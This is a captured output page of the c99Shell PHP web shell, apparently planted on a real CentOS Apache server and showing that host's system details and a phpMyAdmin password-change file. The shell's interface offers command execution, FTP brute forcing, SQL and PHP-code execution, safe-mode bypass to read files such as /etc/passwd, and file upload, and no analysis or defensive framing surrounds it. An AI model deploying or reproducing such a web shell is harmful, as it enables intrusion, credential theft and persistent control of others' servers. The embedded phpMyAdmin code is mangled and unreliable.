!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user_password.php (5.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
' . $strError . '

' . "\n" . '

    ' . $strNoRights . '

' . "\n"; require_once('./libraries/footer.inc.php'); } // end if /** * If the "change password" form has been submitted, checks for valid values * and submit the query or logout */ if (isset($nopass)) { $error_msg = ''; if ($nopass == 0 && isset($pma_pw) && isset($pma_pw2)) { if ($pma_pw != $pma_pw2) { $error_msg = $strPasswordNotSame; } if (empty($pma_pw) || empty($pma_pw2)) { $error_msg = $strPasswordEmpty; } } // end if // here $nopass could be == 1 if (empty($error_msg)) { // Defines the url to return to in case of error in the sql statement $common_url_query = PMA_generate_common_url(); $err_url = 'user_password.php?' . $common_url_query; $hashing_function = (PMA_MYSQL_INT_VERSION >= 40102 && !empty($pw_hash) && $pw_hash == 'old' ? 'OLD_' : '') . 'PASSWORD'; $sql_query = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . preg_replace('@.@s', '*', $pma_pw) . '\')'); $local_query = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . PMA_sqlAddslashes($pma_pw) . '\')'); $result = @PMA_DBI_try_query($local_query) or PMA_mysqlDie(PMA_DBI_getError(), $sql_query, FALSE, $err_url); // Changes password cookie if required // Duration = till the browser is closed for password (we don't want this to be saved) if ($cfg['Server']['auth_type'] == 'cookie') { setcookie('pma_cookie_password-' . $server, PMA_blowfish_encrypt($pma_pw, $GLOBALS['cfg']['blowfish_secret'] . $GLOBALS['current_time']), 0, $GLOBALS['cookie_path'], '', $GLOBALS['is_https']); } // end if // For http auth. mode, the "back" link will also enforce new // authentication $http_logout = ($cfg['Server']['auth_type'] == 'http') ? '&old_usr=relog' : ''; // Displays the page require_once('./libraries/header.inc.php'); echo '

' . $strChangePassword . '

' . "\n\n"; $show_query = 'y'; PMA_showMessage($strUpdateProfileMessage); ?> displays the form */ // Loads the headers $js_to_run = 'user_password.js'; require_once('./libraries/header.inc.php'); echo '

' . $strChangePassword . '

' . "\n\n"; // Displays an error message if required if (!empty($error_msg)) { echo '

' . $strError . ': ' . $error_msg . '

' . "\n"; } // loic1: autocomplete feature of IE kills the "onchange" event handler and it // must be replaced by the "onpropertychange" one in this case $chg_evt_handler = (PMA_USR_BROWSER_AGENT == 'IE' && PMA_USR_BROWSER_VER >= 5) ? 'onpropertychange' : 'onchange'; // Displays the form ?>
= 40102) { ?>
="nopass[1].checked = true" />    ="nopass[1].checked = true" />
:
 
 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--